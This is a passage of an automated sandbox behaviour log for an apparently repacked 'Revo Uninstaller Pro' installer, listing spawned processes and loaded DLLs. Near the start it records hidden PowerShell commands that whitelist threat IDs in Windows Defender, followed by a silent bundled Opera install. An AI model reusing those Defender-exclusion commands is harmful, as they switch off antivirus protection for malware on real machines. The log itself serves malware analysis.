        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess created: C:\Users\user\Downloads\OperaSetup.exe "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
        Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=NWM4YWUzOWQyNTkwZGNkMDZiZDFlODcxMDg5YWFhOTYzNGRjMWI4Njg0MWE5OGMxZDBhOGNkY2I2N2FlOTg3ZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MjM5OC4xNDI4IiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6IjVlOWNkMGQ0LWE0NjMtNDMxNy05NTg0LTU2ZDIwN2Y0ZWE3NCJ9
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYyMzk4LjE0MjgiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiNWU5Y2QwZDQtYTQ2My00MzE3LTk1ODQtNTZkMjA3ZjRlYTc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\runonce.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\grpconv.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\grpconv.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: msi.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oledlg.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oledlg.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textshaping.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textinputframework.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coreuicomponents.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: ntmarta.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
